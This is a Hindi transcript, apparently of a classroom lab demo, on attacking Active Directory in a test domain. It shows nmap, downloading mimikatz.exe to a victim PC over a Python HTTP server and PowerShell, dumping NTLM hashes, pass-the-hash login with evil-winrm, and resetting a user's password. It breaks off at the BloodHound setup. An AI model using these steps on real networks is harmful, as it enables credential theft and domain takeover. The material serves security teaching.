एक्सेस आना चाहिए कि नहीं आना चाहिए, वो कौन देखेगा, डीसी देखेगा। तो सारा काम इसमें कौन करता है, आपका डीसी, जिसको कहते हैं हम अपना डोमेन कंट्रोलर। ठीक, अब इस डोमेन कंट्रोलर के अंदर कई सारी अलग अलग सर्विसेज होती हैं, जैसे कि मैं आपको एक दिखाता हूँ। ठीक है, ये नॉर्मल विंडोज़ की तरह मशीन दिखती है। लेकिन इसके पास एक एक्स्ट्रा एप्लीकेशन होती है सर्वर के अंदर, से कहते हैं सर्वर मैनेजर। यहाँ पे हम अपने पूरे डोमेन को कंट्रोल कर सकते हैं, अपने यूज़र्स को, अपने डिवाइसेस को, अपनी ग्रुप्स को, अपनी परमिशंस को, अपनी पॉलिसीज़ को, सब कुछ। तो एक ही कंप्यूटर से मैं आपके सारे मशीन्स पे एक्सेस करके चीज़ों को एग्जीक्यूट कर सकता हूँ या फिर रिप्लेस कर सकता हूँ। ठीक, तो यहाँ पे जब आप देखोगे तो मैंने इसमें काफ़ी सारी सर्विसेज इनेबल कर रखी हैं, जैसे कि ADDS डोमेन सर्वर की, FS फाइल सर्वर की, LDS लाइट वेट डायरेक्टरी सर्विस की, RMS रिमोट मैनेजमेंट सर्विस के लिए, DHCP कॉन्फ़िगर कर रखा है, DNS खोल रखा है, फाइल स्टोरेज सर्विसेज, ISS सर्वर इंटरनेट सर्विस प्रोवाइडर, IPAM परमिशन एक्सेस के लिए, रिमोट एक्सेस के लिए, रिमोट डेस्कटॉप के लिए, WDS लोकल सर्वर, ऑल सर्वर। तो मैंने इसमें काफ़ी सारी सर्विसेज इनेबल कर रखी हैं। तो अगर आपको और इसमें डीप में चेक करना है इसमें यूज़र्स कितने हैं, तो आपको टूल्स पे क्लिक करना है और यहाँ पे यूज़र्स एंड कंप्यूटर्स पे आ जाना है। तो यहाँ पे आप देख सकते हो इसके डोमेन का नाम है marvel.com। ठीक, marvel.com के अंदर यहाँ पे क्या क्या है, एक फोल्डर इसका नाम बिल्ट इन। तो बिल्ट इन मतलब कि डिफ़ॉल्ट यूज़र्स या ग्रुप्स कौन से इसमें प्रोवाइडेड है। तो यहाँ पे देखोगे आपको मल्टीपल डिफ़ॉल्ट यूज़र्स और ग्रुप्स मिलेंगे। आप अपनी विंडोज़ में चेक करोगे तो आपको ऐसा कुछ नहीं मिलेगा। ठीक है, आप अपनी यहाँ पे ग्रुप पॉलिसी चेक करोगे, प्रो वाले लोग जिसके पास प्रो है
तो आपको यहाँ पे कुछ नॉर्मल कॉन्फ़िगरेशन दिखेंगी जो सिर्फ सिस्टम की और यूज़र की होती हैं, जबकि डीसी के अंदर आपके सारे ग्रुप्स होते हैं जो अदर उसके अंदर ऑर्गेनाइजेशन के अंदर क्रिएट किए जाते हैं, ठीक है। फिर यहाँ पे कंप्यूटर्स कनेक्टेड डिवाइसेस कौन कौन से हैं, तो हमारे पास एक कंप्यूटर डिवाइस कनेक्टेड, इसका नाम है डेस्कटॉप ESP09। तो ये डिवाइस मेरा क्या है, कनेक्टेड है, ठीक है। अभी ये बंद है यहाँ पे, तो उसको मेरे को ऑन करना पड़ेगा पहले। ठीक है, ये मैंने लॉगिन कर लेता हूँ यहाँ पे इसको। नहीं मेरे को वो चढ़ाना ना सर को उसमें पोर्टल पे, तो काउंटिंग देनी है बुक्स हैं। ठीक है, जैसे मैंने यहाँ पे देखो लॉगिन करा, और यहाँ पे जब मैं अपने DNS पे जाऊँगा तो देखो यहाँ पे मेरे, अगर आप चेक कर पा रहे होगे, यहाँ पे marvel.com लिख के आ रहा है। डोमेन का नाम यहाँ पे कोने पे marvel.com लिख के आ रहा होगा, क्योंकि ये उस डिवाइस, उस डोमेन से कनेक्टेड डिवाइस है, ठीक है। और यहाँ पे भी आप चेक कर सकते हो, मैं अपने डिवाइस को यहाँ पे देख पा रहा हूँ, उसकी ऑपरेटिंग सिस्टम, उसका मेंबर, कौन से मेंबर्स हैं वहाँ पे, उसकी डेलीगेशन, उसकी लोकेशन, उसके मैनेज बाई और डायल इन सर्विस, अगर कोई डायल इन सर्विस हमारे पास होती, ठीक है। तो यहाँ पे मैं सारी चीज़ों को इनेबल, यहाँ पे उसके कंप्यूटर का नेम भी यहाँ से अपने मॉडिफाई कर सकता हूँ, नॉर्मल सर्वर जो भी है इसका, ठीक है। फिर इसको मैं मैनेज भी कर सकता हूँ, मैं यहाँ पे इसको अकाउंट को, इसके सिस्टम के अकाउंट्स को डिसेबल कर सकता हूँ। जैसे कि मैं यहाँ पे जाता हूँ यूज़र पे, वहाँ पे देखो मैंने वीडियो नाम के यूज़र से लॉगिन किया था, ठीक है। राइट क्लिक करता हूँ, यहाँ पे इसका पासवर्ड क्या करेंगे हम, या फिर और कुछ करते हैं, इसका अकाउंट ही डिसेबल कर देते हैं यहाँ पे, ठीक है। डिसेबल अकाउंट, डिसेबल्ड। अब मैं वहाँ पे जाऊँगा, सिस्टम को एक बार रीस्टार्ट करूँगा जब, या फिर स्विच यूज़र करूँगा, और अगर यहाँ पे मैं पासवर्ड देता हूँ वीडियो का, तो एक सेकेंड, ये कनेक्टेड क्यों है, डोमेन पे भी है, इसका अकाउंट डिसेबल कर दिया, साइन आउट दोबारा करते हैं, और यहाँ से मैं दूसरे यूज़र स्पाइडरमैन से एक्सेस करके देखता हूँ, ठीक है। यहाँ पे मैं एंटर करता हूँ अदर यूज़र, तो यूज़र नेम है स्पाइडरमैन, और यहाँ पे स्लैश लगा के डोमेन, है ना। तो मार्वल इसका डोमेन है, और स्पाइडरमैन का पासवर्ड, एक बार स्पाइडरमैन से लॉगिन करते हैं, फिर हम इसी चीज़ को वीडियो से करके देखेंगे, तो उसका अकाउंट डिसेबल हो गया, ठीक है। तो आते हैं यहाँ पे, दोबारा से साइन आउट करते हैं, अदर यूज़र मार्वल स्लैश वीडियो, पासवर्ड, देखो लिख क्या रहा है ना, अकाउंट इज डिसेबल्ड, यानी कि मैं अब वीडियो यूज़र को एक्सेस नहीं कर सकता, ठीक है। तो ये सब काम मैं कहाँ मैनेज करता हूँ, अपने डोमेन कंट्रोलर पे। तो मेरे को किसी भी तरह से क्या करना होता है, अपने डोमेन कंट्रोलर का एक्सेस लेना होता है, ताकि मैं वहाँ पे रह के अपने सिस्टम से, उस सिस्टम से सारे नेटवर्क को मैनेज कर सकूँ, ठीक है। किसी के अकाउंट को डिसेबल कर सकूँ, किसी का पासवर्ड भी चेंज कर सकता हूँ। तो वापस से मैं अब इसके यहाँ पे जाके इसको इनेबल कर देता हूँ, इनेबल अकाउंट, ओके।
और वहाँ पे जाके इसको ओके करके दोबारा से लॉगिन कर लेते हैं। अब देखो एक बार में लॉगिन भी हो गया। तो मैं पूरा मैनेज कहाँ से कर पा रहा हूँ? अपने डोमेन कंट्रोल की मदद से। अब ये सेम चीज़ मैं यूज़र्स पे कर सकता हूँ, किसी सर्विस पे कर सकता हूँ, मैं किसी पॉलिसी पे कर सकता हूँ, किसी ग्रुप पे कर सकता हूँ। ठीक, तो एडी के अंदर हम बेसिकली क्या क्या चीज़ें अटैक करते हैं, सबसे पहले मैं पास बता देता हूँ आपको। तो एक्टिव डायरेक्टरी के अंदर जो हमारा अटैकिंग पाथ होता है वो जाता है यूज़र से सर्विस पे, सर्विस से ग्रुप पे, ग्रुप पे डीसी। मतलब कि अगर आपके पास किसी यूज़र का एक्सेस है जो नेटवर्क के अंदर है, तो पहले आप क्या फाइंड करोगे? उसके यूज़र्स फाइंड करोगे, अदर यूज़र्स कौन से हैं। तो यूज़र्स फाइंड करने का मतलब ये है, आपने जो अदर यूज़र्स निकाले, तो जो यूज़र आप हो उस यूज़र से आप किसी अदर यूज़र की परमिशंस को चेंज कर सकते हो या फिर किसी ग्रुप में मॉडिफिकेशन कर सकते हो। तो वो चीज़ आप चेक करोगे सबसे पहले स्टेप में, यूज़र वाले स्टेप पे। फिर अगला स्टेप होगा आपका सर्विस का। तो जिस प्रेजेंट यूज़र पे आप हो, वो प्रेजेंट यूज़र किस किस सर्विस को रन कर सकता है, किस किस सर्विस को मॉडिफाई कर सकता है। तो ये चीज़ आप चेक करोगे सेकेंड स्टेप में। तीसरी चीज़, जो यूज़र आप प्रेजेंट करेंटली में हो, वो यूज़र आप किस ग्रुप के अंदर आते हो और उस ग्रुप की क्या परमिशन और सर्विसेज इनेबल हैं। तो ये चीज़ आप चेक करोगे थर्ड स्टेप में। फिर लास्ट में आपको ऑटोमेटिकली डीसी का कोई यूज़र मिलेगा या तो फिर कोई सर्विस मिलेगी जिस पे आपको उसको एक्सेस करना होता है। तो ये स्टेप्स होते हैं। अब ज़रूरी नहीं है आप जिस यूज़र से एक्सेस किया है वही एक्सेस आपको डायरेक्ट डोमेन कंट्रोल पे लेके जाए, कोई दूसरी यूज़र भी हो सकता है, कोई सर्विस भी हो सकती है। ठीक, तो ये चीज़ें फाइंड कैसे करी जाती हैं वो देख लेते हैं। तो यहाँ पे मैं क्या करता हूँ, काली ओपन करते हैं। क्लोन काली। अरे काली है, क्लोन है। ठीक है, सबसे पहले हम क्या करेंगे, मैं इस सिस्टम की आईपी निकालूंगा और इसकी आईपी को पिंग करेंगे। तो हम 192.168.134.144 को पिंग करके देखते हैं। चल रहा है। खुल जा टर्मिनल। यहाँ पे क्या करेंगे, पिंग करके चेक करते हैं क्या मशीन हमारी एक्टिव है, एक्टिव है। ठीक, दूसरी चीज़ क्या करेंगे, हम इसको अपनी होस्ट फाइल में ऐड करेंगे और इसका जो डोमेन है वो अपने यहाँ पे ऐड करेंगे। जैसे यहाँ पे लिखा हुआ marvel.com लिखा हुआ है। ठीक है, क्विट करता हूँ। अब ठीक है, nmap करके देखते हैं क्या चीज़ आती है इस पे।
कितना हो गया ये? हो गया। ठीक है, तो देखो यहाँ पे nmap स्कैन कंप्लीट हो चुका है। अब देखते हैं इसमें आउटपुट क्या क्या है। आएगा वही आएगा नटकट, वही का ही है ना, किसका है? मेरा है। हाँ, ऐसा नटकट छोड़ देते हैं, इसको हमारे नहीं खाता। नटकट तो करते हैं ना। और कहाँ है? इसमें अभी यार इतना अंदर है बदली कैप्चर दे कैप्चर है ही इसमें। हैं? कराची का ना? गूगल से लॉगिन करो ना, हो जाएगा। हाँ। गूगल से लॉगिन करो ना। क्यों ऐसा अकाउंट अभी बन नहीं रही इसका? नहीं वो अलग है, वो अलग अकाउंट है, मिल बनेगा बनता है। ठीक है, अब यहाँ पे देखो कितने सारे पोर्ट्स, जिस सर्विस का पोर्ट होगा वो सर्विस पे इनेबल्ड है। जैसे 42 टीसीपी रैपिंग के लिए है ना। और यहाँ पे चेक करो, अगला पोर्ट है आपका डीएनएस डोमेन नेम, यानी कि जो डीएनएस सर्वर है 5380, यानी कि इसमें वेबसाइट कोई होस्टेड है। तो अगर आप यहाँ पे चेक करोगे इसकी आईपी डाल के तो आपको दिखेगा। नहीं दीवार नहीं खिंचवाऊंगा, दोनों एक ही पार्टीशन हो जाएगा। इसमें भी शेयर वाले बैठे ना, वो एक हो जाएगा। देखो चल रहा है ना वेब पेज यहाँ पे। तो 480 पे क्या है आपका, एक वेब पेज चल रहा है। फिर 88 कर्ब्रोस यानी कि ऑथेंटिकेशन मैकेनिज्म है ये, जो ऑथेंटिकेशन के लिए यूज़ की आती है सिस्टम पे एक्सेस करने के लिए। MSRPC आरपीसी क्लाइंट के लिए होता है हमारा ये। नेट बायोस आपका एसएमबी सर्विस के लिए यूज़ किया जाता है। LDAP लाइट वेट डायरेक्टरी एक्सेस प्रोटोकॉल, ये नेटवर्क में चीज़ों को शेयर करने के लिए होता है, एक्सेस करने के लिए होता है। ठीक है, एक वेब पेज आपका 443 पे चल रहा है ना। फिर माइक्रोसॉफ्ट डीएस डेटा सेंटर एसएमबी है 445 के पासवर्ड 5, ये आपको किसके लिए, कर्ब्रोस के लिए। फिर यहाँ पे एक सर्विस और LDAP के लिए क्लाइंट सर्विस है 3268 के लिए। फिर एक आपके पास वेब सर्वर 3389 पे, और एक हमारे पास HTTP API सर्विस है जो कि 5985 पे चल रही है। है ना, वो प्राइवेट मॉड्यूल अलग है, CTF के लिए। CTF हम लोग करते हैं ना तब यूज़ करते हैं। उसमें तो कुछ दिखाई नहीं रहा। वो तुम्हें दिखेगा नहीं ना। चाप के लिए है वो। तभी से आता हो यहाँ से हमारा क्या। गगन जी, हाँ भैया बोलो। ठीक है, तो आपको जितने पोर्ट्स मिलेंगे आपको क्या करना है, उतने पोर्ट्स को स्कैन करके सर्विसेज को आइडेंटिफाई करना है। ठीक है, अब देखो कुछ नॉर्मल चीजें, जैसे कि अगर आपने कौन कौन सी रखी थी? ठीक है, और नीचे देखो NB स्कैन पे जब हम करते हैं तो यहाँ पे इसके नेट बायोस का नेम, डिवाइस का नाम आ रहा है, नेट बायोस की इन्फॉर्मेशन आ रही है, इसके डेटा सेंटर सर्वर कौन सी यूज़ कर रहा है इवैल्यूएशन पे, नेट बायोस का नाम, डोमेन का नाम मावा.com, फॉरेस्ट का नेम मावा.com, और आपकी SQL सर्विस का नाम FQDN सर्विसेज का नाम पूरा। तो जो भी इन्फॉर्मेशन आपको ये मिलती है आप इसको क्या करोगे, अपने होस्ट फाइल पे ऐड करोगे। ठीक, अब दूसरी चीज़, जैसे मान लीजिए अब आपके पास ये सर्वर है, नॉर्मल एक्सेस है। अब विंडोज़ में एक्सेस कैसे लेते हैं, अलग अलग चीज़ें, जैसे मैंने आपको बताया भी था, लेकिन आप चीज़ों को एक्सेस कर सकते हो विंडोज़ के अंदर अलग तरीके से। कैसे, विंडोज़ आपको एक सर्विस प्रोवाइड करती है जो 5985 पे चलती है, उसको कहते हैं MSRPC। तो अगर आप यहाँ लिखोगे ईमेल -winrm और यूज़र नेम दो अपना, जो भी आपको एक्सेस करना है, एडमिनिस्ट्रेटर, और उसका पासवर्ड -p दे के पासवर्ड दे के आप एंटर करोगे
तो आपको CLI एक्सेस मिलता है किसका, विंडोज़ की मशीन का, ठीक है। तो यहाँ पे किसका एक्सेस है मेरे पास, ये सर्वर का एक्सेस है, क्योंकि मेरे को यहाँ पे पासवर्ड पता है, ठीक। अब यही सेम चीज़ मैं किसके संग कर सकता हूँ, उसके सिस्टम के हैश के साथ। कैसे कर सकते हैं, देसी आपको क्या करना होता है, अपनी विंडोज़ मशीन के अंदर जो भी मशीन है, जैसे कि ये मेरा बच्चा के साथ कितना चाहिए। बांटने जा रहे हो? ठीक है, जैसे ये विंडो यूज़र है, पासवर्ड लिखते हैं यहाँ पे, एक के ऊपर क्लिक कर दो ना, 1 घंटा हो जाएगा ना, बस 2 बार तो नहीं है। ठीक है। अब ये सिस्टम है, मान लो ये मेरे विक्टिम का सिस्टम है, ये मेरे DC से कनेक्टेड है, डोमेन कंट्रोलर से कनेक्टेड है। अब मेरा जो विक्टिम है उसने यहाँ पे एडमिनिस्ट्रेटर ने लॉगिन करा, यहाँ पे मैं इसको बंद करता हूँ, साइन आउट करता हूँ। दो नहीं रखो, लोड भी नहीं, किसी के पास नहीं। डेटा निकाला जी लेखा ठीक है, एडमिनिस्ट्रेटर और पासवर्ड देते हैं इसका। तो जब हमारा यूज़र लॉगिन करता है किसी मशीन पे, तो वहाँ पे हमारा सिस्टम क्या करता है, अपने रैम के अंदर, अपने कंजप्शन के अंदर उस यूज़र का पासवर्ड स्टोर कर लेता है हैश में, जिसको हम NTLM हैश भी कहते हैं, ठीक है, सैम फाइल के अंदर, सैम सिस्टम फाइल के अंदर। तो जब ये यूज़र यहाँ पे क्रिएट हो रहा है, तो वो उसने क्या करा, वहाँ पे सिस्टम के अंदर सारे यूज़र्स का पासवर्ड स्टोर कर लिया हुआ, ठीक। अब ये एडमिन है, मेरे पास इस मशीन का एक्सेस आ चुका है, ठीक। तो मैं यहाँ पे क्या करूँगा, एक टूल होता है, इसको कहते हैं मिमीकैट्स, ठीक है। तो हम क्या करेंगे, अपनी विक्टिम की लिनक्स की मशीन, जो काली वाली मशीन है, यहाँ पे मिमीकैट्स को क्या कर लेंगे, डाउनलोड कर लेंगे, ठीक है। मिमीकैट्स पे गए, यहाँ पे हम क्या करेंगे, आर्किटेक्चर यूज़ करेंगे x64, और ये जो हमारे पास exe फाइल है, इसको क्या कर लेंगे, डाउनलोड कर लेंगे, ठीक है। और ये तो गलत मशीन है, ये नहीं, ये वाली, ठीक है। यहाँ पे करेंगे wget और exe फाइल को कर लेंगे डाउनलोड। यहाँ पे हम करेंगे अब इम्पैकेट सर्वर अपना स्टार्ट, और जो मेरी विक्टिम की नॉर्मल मशीन है, ठीक है, यहाँ पे जाके अपने पावर शेल खोलेंगे, और यहाँ पे IWR-URI या सॉरी वो है ना, तो कॉपी /IP एड्रेस अपनी मशीन की, तो 192.168.134.160 है ना। यहाँ पे करेंगे // फाइल का नाम जो कि है हमारी mimikatz.exe, वन 192.168.130/kali/file और आउटपुट के लिए एंटर करेंगे, बिकॉज इट डज नॉट एग्जिस्ट। खाली के डाउनलोड नहीं, ये रहा ना फाइल मिमीकैट्स, कनेक्शन ही नहीं आया, एक सेकेंड। Find the path does not exist, path नहीं बता रहा। ग्रेजुएशन के अंदर तो बोलो कितना है, इतना मैं कैंडिडेट से तो मैं नोट करना फाइल होना चाहता हूँ।
3 4 सही तो है, रेंज पे भी है। वो क्यों नहीं रहा ये? 160 पे आ ही नहीं रहा कनेक्शन। आ तो रहा इनकमिंग कनेक्शन, रिमेनिंग कनेक्शन। कोई नहीं, इसको हम सर्च कर लेते हैं उससे पाइथन 3 -m http server 80, इससे ट्राई कर लेते हैं। और यहाँ पे हम करेंगे IWR-URI 192.168.134.160/mimikatz.exe-out फाइल और mimikatz.exe एंटर होने लगा डाउन। ठीक है, तो यहाँ पे देखो फाइल आ चुकी है mimikatz.exe। इसको करते हैं रन। लगता है उसने फाइल डिलीट कर दी उसको। क्या हो गया, राइट क्लिक क्यों चल रहा है इसमें? बाहर चल रहा है, बाहर चल रहा है। उसके लिए उतना अमाउंट भी तो डालना पड़ेगा ना। अब 1 लाख के बोर्ड में लग जाओगे और तो गाड़ी में लगा के दोबारा बैंक में डालना। चल क्यों नहीं रहा? सर इतने पास से भी देखते हो वो। अरे बाहर से नहीं देखता, छोटे छोटे लिखा हुआ है। गाड़ी को ठीक है। mimikatz.exe सही तो है। मैं रखना नहीं चाहता हूँ। सर खर्च हो जाता है हमारा। ऐसा भी होता रोल बंद है सर। बंद हो गई, मैं डिलीट हो जाती है अब तक तो। है। शेयर मार्केट में सारा बंद है। क्या बात करो, गोल्ड का रेट देख लो थोड़ा 92 पे चला गया। तो गोल्ड के लिए होना तो चाहिए तो उतना भी नहीं है ना। थोड़ा कम तो उतना तो आएगा नहीं। 50 में क्या ही आएगा नहीं आएगा। सर्वर से आ क्यों नहीं रहा? कॉपी कमांड भी नहीं चल रहा। पैसे तो बढ़ रहे हैं। इस पे ट्राई करूँ इस बार? अच्छा मैं भी बात बताऊँ, 10 शेयर लेके किसी कंपनी के लोग 40,000 के, और भी तो इन्वेस्ट करो ना आगे। जब वो पैसा आएगा तो उसका भी गोल्ड लेने का एक टाइम पे ले लेते हैं। जब तक लगभग 1 लाख ना होगा तो कुछ लाख के बाद जाके सर्विस से आती है। गोल्ड बॉन्ड्स ले लो, समझे? गोल्ड बॉन्ड्स ले लो, सुनार के बाद जाने ही होगा ना। होता ही नहीं होते। पेटीएम वगैरह में मिला दो आपको ऑनलाइन गोल्ड। वैल्यू तो मतलब सेम ही रहती है। नाम से इस बात की दिक्कत है। mimikatz.exe सर गलत नहीं होगी। एक है मिनी कैट्स आएगा कार्स KATZ ही तो है। यहाँ पे नीचे KATZ नीचे गलत लिख दिया सर अगर होल मार्क कहाँ पे? मिनी कर्ज हो गया। अच्छा अच्छा, ओ आउट फाइल -out फाइल एंटर और ./mimikatz। OS प्लेटफॉर्म क्यों नहीं दिखा रहा ये? लाइन 1 एक बार जरा उससे ट्राई करता हूँ। पूछो बोल की बात आता है। कम से कम रात होता तो ये कर लेना। कॉपी // to दूर के ऊपर है ना, दूर भी है, उसको भी कुछ। सूरज की वजह से पीछे।
यहाँ पे हो गया, वो देखो आ गया ना फाइल mim.txt। इसमें कुछ दिक्कत होगी SMB की वजह से। तो अब मैं इसको रन करता हूँ यहाँ पे एंटर, तो ये रन हो गया, ठीक है। तो जैसे ये फाइल रन होगी आपके सिस्टम के ऊपर, ये सिस्टम से इंटरेक्ट करेगी और जो भी इसके हैशेस होंगे वो डंप करेगी। तो यहाँ पे आप क्या करोगे, पहले चेक करोगे प्रिविलेज : डीबग। इसके लिए आपको करंट मशीन पे एडमिन एक्सेस होना जरूरी है। डोमेन के अंदर मान लीजिए जैसे कि हमारे पास ये थे, एक ये DC सर्वर था, एक नॉर्मल PC था। तो अगर आपके पास नॉर्मल PC का एक्सेस है तो नॉर्मल PC का भी आपको एडमिन एक्सेस रिक्वायर्ड चाहिए, एडमिन प्रिविलेजिएशन करना पड़ेगा, तभी आप DC के हैश को निकाल पाओगे, सिस्टम के अंदर के यूजर्स के हैश को निकाल पाओगे। तो प्रिविलेज एस्केलेशन इसमें करना मैंडेटरी है, एडमिन एक्सेस लेना मैंडेटरी है। फिर यहाँ पे आपको उसको इसके कमांड्स लिखने होते हैं, sec URL SA : LSA dump, ठीक है, sec URL SA : LSA dump, एंटर। सेम ही रहेंगे ना प्रिविलेजेस के लिए नहीं, पर वो तो इंटरनल होगा ना बाय डिफॉल्ट से सेम ही रहेगा। मैं भी तो वही बात कर रहा हूँ। चल इसके बाद की बात करने क्या लिखिएगा मैंने इसकी चीट शीट देख लेते हैं, चलो मिनी कैट्स चीट शीट। तो इसकी जो कमांड है वो है sec URLs लॉगिन पासवर्ड्स और LSA डंप भी है हमारे पास। तो लॉगिन पासवर्ड भी ट्राई कर लेते हैं पहले, ठीक है। एंटर। तो जो भी डिवाइस पे लॉगिन पासवर्ड्स होंगे पहले ये शो करेगा। तो देखो यहाँ पे किस किस के हैं, यहाँ पे हमारे पास हैं सबसे पहला ISS डोमेन का है ना, यूज़र नेम क्या है, जो डिवाइस है उसका, NTLM हैश है हमारे पास, ठीक है। हमारे पास DWM यूज़र है, विंडोज़ मैनेजर यूज़र का NTLM हैश है मेरे पास, और मेरे पास यहाँ पे क्या है MySQL सर्विस का भी हैश है जो कि अभी ये रहा है ना, MySQL यूज़र का है, MySQL सर्विस का है, और ये रहा मेरा एडमिन का हैश। यहाँ पे देखो NTLM हैश मेरा एडमिन का शो कर रहा है। तो मैं क्या कर सकता हूँ, इसको कॉपी करके अपनी विक्टिम की मशीन, जो हमारी मशीन है यहाँ पे मैं डायरेक्ट इसको क्या कर सकता हूँ, एक फाइल में से मान लो स्टोर कर लेता हूँ, ठीक है, vim NTLM हैश, ठीक है। इसको सेव कर लेते हैं मान लो इसमें, ठीक। सेव करने के बाद मैं इसको ब्रूट फोर्स कर सकता हूँ हैश कैट जॉन द यूज़ करके क्रैक करने के लिए, ठीक है। लेकिन मान लो कभी कभी बहुत बड़ा पासवर्ड होता है, जैसे कि बहुत बड़ा पासवर्ड है, यहाँ पे कुछ टेक्स्ट भी लिखे हुए हैं जो उस फाइल के अंदर नहीं है, ठीक है। तो मैं क्या करूँगा, इसको डायरेक्ट यूज़ कर सकता हूँ अपनी evil winrm का यूज़ करके, evil-winrm मशीन की IP है हमारी ये, ठीक है। और जो मैंने हैश कॉपी किया वहाँ से, ये वाला NTLM का हैश, इसको मैं डायरेक्ट यूज़ कर सकता हूँ बिना पासवर्ड दिए। अरे कॉपी नहीं हुआ, मतलब अगर ये टेस्ट करेंगे तो बोनस चले जाएगा। भाई मेरा मोबाइल है क्या? नहीं अच्छा अच्छा ठीक है। एंटर करते हैं तो देखो डायरेक्ट मेरे को एडमिन एक्सेस मिल गया बिना उसके पासवर्ड दिए। तो अगर मैं सिस्टम पे रह के उसका हैश निकाल सकता हूँ NTLM किसी उसका यूज़र का, तो मैं उसको कर सकता हूँ। पासवर्ड चेंज नहीं कर सकते? पासवर्ड चेंज भी कर सकते हैं हम यहाँ पे। तो बाबू 5 बज रहे हैं और सैटरडे है। जैसे मैं यहाँ पे करूँ नेट यूज़र, ठीक है, तो यहाँ पे कितने यूज़र हैं, विडो है, SMB यूज़र है, स्पाइडरमैन है। अब विडो का पासवर्ड है पासवर्ड, ठीक है। तो मैं यहाँ पे क्या करूँ, ChatGPT खोलता हूँ, लिखता हूँ यहाँ पे चेंज विंडोज़ यूज़र्स पासवर्ड इन एक्टिव डायरेक्टरी, ठीक है। CLI नहीं लिखा, ये रहा, ठीक है। तो ये रहा सेट AD अकाउंट कमांड होती है, यूज़र नेम पासवर्ड और उसको रीसेट।
इतना करने से मैं क्या कर सकता हूँ, उसको कॉपी करते हैं, यहाँ पे सिस्टम पे आते हैं, नोटपैड ओपन करते हैं, यस, इसको पेस्ट करते हैं और यहाँ पे चीज़ों को चेंज कर देते हैं। तो यूज़र नेम क्या है मेरा, विडो, WIDW। ओल्ड पासवर्ड है जो वो डाल देता हूँ। अगर हमें ओल्ड पासवर्ड पता ही ना हो तो बिना उसके भी कर सकते हैं रीसेट। और न्यू पासवर्ड जो आपको देना है, तो यहाँ पे मैं इसको कर देता हूँ पासवर्ड, इतना करके कॉपी करके यहाँ पे रन कर देते हैं इसको, एंटर। तो क्या दिखा रहा है, राहुल सर व्हाट्सएप पे मैसेज पढ़ लिया करो कभी, नेटवर्क पासवर्ड इज नॉट करेक्ट। अब तो फिर फायदा नहीं। अच्छा मैं फ़ोन से पीछे रखा था ना। क्या हो गया, कन्वर्ट सिक्योर स्ट्रिंग, अच्छा कॉपी पेस्ट में दिक्कत होगी इसमें। कॉपी पेस्ट में दिक्कत हुई है, तो ये लिखना पड़ेगा यहाँ पे, है ना। हाँ वो लिखना पड़ेगा दोबारा, तो वो भी हो जाएगा। नहीं तो ये बिना रीसेट वाला ट्राई कर लेते हैं। यहाँ पे यूज़र नेम हो जाएगा विडो, पासवर्ड है आपका जो नया वाला। बढ़िया, बताइए। सर वो सेका कह रहा था कि आज के लिए इतना काफ़ी है, वो उसे कुछ ज़रूरी काम है और बोला था मॉर्निंग में हो जाए तो ज़्यादा अच्छी है। तो नस्ता फ्री है ना, एंटर। उसमें कोई आता ही नहीं है। आज भी एक ही बच्चा आया था, बैटरी मीट करा रहे थे। टाइम पॉइंट पर। अच्छा अब देखो यहाँ पे, देखो क्या दिखा रहा है, द पासवर्ड डज नॉट मीट द लेंथ कॉम्प्लेक्सिटी ऑफ द हिस्ट्री रिक्वायरमेंट ऑफ द डोमेन। तो यहाँ पे जो सिस्टम के अंदर जो कॉम्प्लेक्सिटी रिक्वायर्ड है पासवर्ड के लिए, वो उसमें मैच नहीं हो रही है ना। तो मैं यहाँ पे जो नया पासवर्ड देना चाह रहा हूँ उसको चेंज करके यहाँ पे PA$W04D के आगे लिख देता हूँ 1 2 3 4, ठीक है। अब इसको कॉपी करके दोबारा रन करेंगे, एंटर। तो देखो अब हमारा यूज़र का पासवर्ड वीडियो का चेंज हो चुका है बिना हमारा ओल्ड पासवर्ड दिए हुए, ठीक है। पहले हमारा पासवर्ड था पासवर्ड, क्योंकि देखो यहाँ पे क्या लिखा है, पासवर्ड डज नॉट मीट द लेंथ कॉम्प्लेक्सिटी और हिस्ट्री रिक्वायरमेंट ऑफ द डोमेन। तो डोमेन के अंदर जो रिक्वायरमेंट होती है पासवर्ड की देने की, जैसे कि 8 लेंथ का करेक्टर होना चाहिए, एक सिंगल कोट, एक डबल कोट, एक अपर लेयर, एक है ना अपर केस लोअर केस, वो चीज़ नहीं हो पा रही थी। तो मैंने पासवर्ड को चेंज कर दिया किसमें, पासवर्ड 1 2 3 4 के अंदर। तो अब मैं अपने सिस्टम पे जाऊंगा, यहाँ से अपने सिस्टम को वीडियो को लॉगिन करते हैं। तो सर हमने इसमें ओल्ड पासवर्ड नहीं दिया, नहीं दिया, डायरेक्ट डायरेक्ट दे दिया, जान ठीक है। अच्छा अदर यूज़र यहाँ पे लिखते हैं वीडियो। अब पासवर्ड देखो पुराना वाला देता हूँ पहले, ठीक है, PA$W04D, चेक करो, देखो वही है पुराना वाला, एंटर करते हैं। मुझसे तो हो गया ये, दोबारा ट्राई करते हैं एक बार डोमेन से। मेरा डोमेन ऐड किया था ना मैंने, साइन आउट। देखो अब आगे गलत है ना। तो इस डोमेन यूज़र को अगर एक्सेस करना है तो आपको नया वाला पासवर्ड देना पड़ेगा, जो कि था PA$W04D 1 2 3 4, PA$W04D 1 2 3 4। क्या कर दिया मैंने, पासवर्ड PA$W04D 1 2 3 4 सही तो है।
टाइपिंग वही नया वाला registration टाइपिंग रहता है, ठीक है। तो इस तरह से किसी यूज़र का पासवर्ड भी अपडेट हो। अब जरूरी नहीं है तो पासवर्ड खाली अपडेट हो, तुम उसको हटा दो, डोमेन से हटा दो, है ना, तुम उसको किसी ग्रुप से हटा दो, सब कुछ कर सकते हो, डिपेंड करता है तुम्हारा मोटिव क्या है, ठीक है। तो एडी के अंदर क्या रहेगा, तुम्हारा मोटिव रहेगा। तो अब देखो, जैसे मान लो मेरे को ये फाइंड करना है कि इस सिस्टम के अंदर कितने यूज़र्स हैं, ठीक है, इस डोमेन के अंदर कितने यूज़र्स हैं, ठीक है, और उनकी सर्विस क्या है। तो एक नेटवर्क के अंदर 200, 300, 400, 500 कितने भी यूज़र्स हो सकते हैं, सबको हम मैन्युअली नहीं फाइंड कर सकते। तो उसको ऑटोमेट करने के लिए हम यूज़ करते हैं टूल का नाम ब्लड हाउंड, ठीक है। तो अब देखो ब्लड हाउंड कैसे यूज़ करते हैं। सबसे पहले आपके सिस्टम पे दो चीज़ होनी चाहिए, एक होता है आपका Neo4j और दूसरा आपका ब्लड हाउंड। तो जिसको Neo4j इंस्टॉल करना हो तो यहाँ पे लिखिएगा apt-get install Neo4j और एंटर कर 